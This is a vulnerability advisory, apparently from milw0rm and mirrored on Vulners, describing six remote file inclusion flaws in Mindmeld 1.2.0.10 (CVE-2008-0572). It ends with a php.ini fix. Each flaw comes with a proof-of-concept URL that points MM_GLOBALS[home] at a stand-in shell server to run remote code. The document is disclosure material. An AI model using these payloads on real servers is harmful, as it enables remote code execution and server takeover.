Mindmeld 1.2.0.10 - Multiple Remote File Inclusions
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2008-0572 | 5 Feb 200801:00 | – | cve | |
| CVE-2008-0572 | 5 Feb 200801:00 | – | cvelist | |
| EUVD-2008-0582 | 7 Oct 202500:30 | – | euvd | |
| Immunity Canvas: MINDMELD_INCLUDE | 5 Feb 200802:00 | – | canvas | |
| CVE-2008-0572 | 5 Feb 200802:00 | – | nvd | |
| Remote file inclusion | 5 Feb 200802:00 | – | prion |
Summary
Mindmeld is an, "enterprise-capable knowledge-sharing system" written
in PHP. There are multiple remote file inclusion vulnerabilities in
Mindmeld version 1.2.0.10 (latest version).
Details
1. Vulnerable File and Line:
Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
require_once ( $MM_GLOBALS['home']."include/utilities.inc" );
PoC:
http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
2. Vulnerable file and line:
Mindmeld-1.2.0.10/include/ask.inc.php: line 34
require_once ( $MM_GLOBALS['home'] . "interfaces
{$MM_GLOBALS['interface']}/include/" .
"interface_{$MM_GLOBALS['interface']}_ask.inc" );
PoC:
http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://
shell_server/shell.php?php?
---
3. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/learn.inc.php: line 38
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"
PoC:
http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
4. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/manage.inc.php: line 31
require_once ( $MM_GLOBALS['home'] . "interfaces/
{$MM_GLOBALS['interface']}/include/"
PoC:
http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
5. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/mind.inc.php: line 33
require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );
PoC:
http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
6. Vulnerable File and Line:
Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" );
PoC:
http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell
_server/shell.php?
---
It appears that these vulnerabilities are not vulnerable to local file
includes.
These vulnerabilities have been disclosed to the vendor although
development on this software has stopped.
Sources:
http://mindmeld.sourceforge.net/
Quick Fix:
In php.ini, disable the following variables: register_globals,
allow_url_fopen, and allow_url_include.
Credit:
David Wharton
# milw0rm.com [2008-01-31]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 26.8
EPSS0.21529